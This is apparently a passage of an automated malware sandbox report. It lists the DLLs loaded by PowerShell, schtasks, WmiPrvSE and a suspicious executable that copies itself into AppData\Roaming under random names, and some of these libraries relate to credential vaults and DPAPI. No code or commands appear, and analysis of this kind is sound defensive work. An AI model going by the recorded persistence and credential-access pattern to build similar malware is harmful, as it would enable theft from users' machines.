                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
